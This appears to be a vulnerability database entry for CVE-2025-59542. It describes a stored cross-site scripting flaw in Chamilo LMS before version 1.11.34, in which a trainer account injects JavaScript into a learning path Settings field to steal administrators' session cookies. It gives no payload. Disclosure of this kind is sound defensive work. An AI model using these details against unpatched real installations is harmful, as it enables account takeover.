Vulnerability Description
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the course information page, including administrators. This allows an attacker to exfiltrate sensitive session cookies or tokens, resulting in account takeover (ATO) of higher-privileged users. This issue has been patched in version 1.11.34.
CVSS Score
CRITICAL
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Chamilo | Chamilo Lms | < 1.11.34 |
Related Weaknesses (CWE)
References
- https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.34ProductRelease Notes
- https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-pxrh-3rcp-h7m6Vendor Advisory
FAQ
What is CVE-2025-59542?
CVE-2025-59542 is a vulnerability with a CVSS score of 9.0 (CRITICAL). Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings ...
How severe is CVE-2025-59542?
CVE-2025-59542 has been rated CRITICAL with a CVSS base score of 9.0/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2025-59542?
Check the references section above for vendor advisories and patch information. Affected products include: Chamilo Chamilo Lms.